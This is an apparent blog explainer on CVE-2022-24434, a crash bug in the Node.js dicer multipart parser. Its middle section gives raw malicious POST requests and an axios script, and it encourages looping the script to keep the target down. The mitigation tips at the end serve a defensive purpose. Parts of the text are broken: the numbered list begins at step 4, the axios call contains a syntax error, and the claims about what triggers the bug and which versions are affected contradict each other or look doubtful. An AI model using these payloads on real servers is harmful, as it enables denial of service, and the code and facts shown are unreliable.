If you’re building Node.js services that handle multipart/form-data (often used for file uploads), there’s a good chance you’ve used the dicer package. But did you know an attacker can make your server crash over and over again with a very small, cheap payload? That’s what CVE-2022-24434 is all about.
Let’s break down what this vulnerability is, how it works, and how you can protect your service.
What is Dicer?
Dicer is a popular npm package for parsing multipart/form-data. Most web services that allow users to upload files or images go through this kind of data. Dicer is lightweight and fast, which is why it’s often used in open source projects and production services.
The Heart of the Problem: CVE-2022-24434
CVE-2022-24434 is a vulnerability that affects *all versions* of the dicer package. When dicer receives certain malformed input, it throws an uncaught exception or enters an error state that crashes the entire Node.js process. There is NO built-in protection or graceful handling.
DoS (Denial-of-Service): A malicious user can POST a single request and take down your service.
- Repeatable: The attacker can send the payload repeatedly, causing your service to be in a constant state of crash/restart.
- No authentication needed: If your endpoint is public, anyone can do this—no special access needed.
Dicer tries to process the input, encounters a bug, and throws an uncaught error.
4. Unless you’ve set up special error handling (which most don’t), *your entire Node.js service process crashes*.
5. The attacker can repeat this either manually or with a simple script, and your service goes down every time.
Here is a very basic malicious HTTP request (you can use curl or a simple script for this)
POST /upload HTTP/1.1
Host: your-server.com
Content-Type: multipart/form-data; boundary=malformedboundary
--malformedboundary
Content-Disposition: form-data; name="file"; filename="attack.txt"
Content-Type: text/plain
hacked
--malformedboundary
But the trick is to make the boundary malformed (for example, missing the final ending, or having random junk), like this:
POST /upload HTTP/1.1
Host: your-server.com
Content-Type: multipart/form-data; boundary=malformedboundary
--malformedboundary
Content-Disposition: form-data; name="file"; filename="attack.txt"
Content-Type: text/plain
hacked
--malformedboundar
Notice the boundary at the end is *misspelled* (missing the "y").
Or using Node.js’s popular axios + form-data:
const axios = require('axios');
const FormData = require('form-data');
const form = new FormData();
form.append('file', 'attack', { filename: 'attack.txt' });
const headers = form.getHeaders();
headers['content-type'] = 'multipart/form-data; boundary=malformedboundary'; // force intentionally bad boundary!
axios.post('http://your-server.com/upload';, form, { headers })
.then(() => console.log('Payload sent!'))
.catch(err => console.error('Server might have crashed:', err));
Repeat this payload in a loop and you can keep crashing the target service.
What Happens In Node.js
If you haven’t set up uncaughtException handlers, when dicer throws its error, Node.js sees this as a fatal crash and shuts down. This is super common in express-based setups, where multipart file upload endpoints just trust whatever form data is sent.
How To Fix or Mitigate
- Update dicer: Check if a fixed version is available (security advisory here).
- Use robust error handlers: Add try/catch and process.on('uncaughtException', ...) to log and handle unexpected crashes gracefully (though this is a band-aid, not a fix).
- Validate Content-Type: Only accept well-formed Content-Type headers and reject requests that look odd early.
Rate limit: Make it harder for the attacker to brute-force your endpoint.
- Switch parser: Consider alternatives like busboy or multer if they are not vulnerable or have better support.
References
- NPM Security Advisory
- MITRE CVE Entry
- Dicer on GitHub
- OWASP – Uncaught Exception DoS
Conclusion
CVE-2022-24434 is a reminder that even the smallest, most trusted dependencies can be an attacker’s backdoor. If your app processes file uploads, check your dependencies now, patch dicer, and set up defensive code. Don’t wait for a random crash to be your wake-up call—secure your Node.js services today!
Have more questions? Or seen this in the wild? Let me know in the comments!
Timeline
Published on: 05/20/2022 20:15:00 UTC
Last modified on: 06/07/2022 02:04:00 UTC